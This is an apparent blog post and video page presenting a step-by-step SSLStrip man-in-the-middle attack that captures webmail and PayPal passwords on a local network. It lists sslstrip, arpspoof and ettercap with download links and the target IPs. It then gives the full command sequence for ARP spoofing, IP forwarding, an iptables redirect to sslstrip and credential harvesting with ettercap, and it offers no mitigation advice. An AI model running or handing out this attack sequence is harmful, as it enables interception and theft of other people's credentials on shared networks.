Stripping SSL + Sniffing HTTPS (SSLStrip)

This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/SSLStrip.mp4

Method

  • Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
  • Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
  • SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
  • ettercap then picks out the username & password.

Tools

  • sslstrip
  • arpspoof
  • ettercap

All in BackTrack 4 Pre Final

Network Setup

Targets IP: 192.168.1.6

Gateway : 192.168.1.1

Software

Name: sslstrip

Version: 0.2

Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html

Download Link: hxxp://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz

Name: arpspoof (DSniff)

Version: 2.3

Home Page: http://www.monkey.org/~dugsong/dsniff/

Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: ettercap

Version: 0.7.3

Home Page: http://ettercap.sourceforge.net/

Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
kate  /etc/etter.conf
# uncomment redir_command_off in the iptables, linux section
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0



### Alternative
wireshark

kate  /etc/etter.conf

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i eth0 -t 192.168.1.12 192.168.1.1
#ettercap -T -q -i eth0 -M ARP /192.168.1.1/ /192.168.1.12/

ettercap -T -q -i eth0

sslstrip -k -f

Notes

  • You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!

Song: 16 Bit Lolitas - Nobody Seems To Care

Video length: 03:55

Capture length: 4:41

Blog Post: https://blog.g0tmi1k.com/2009/07/stripping-ssl-sniffing-https/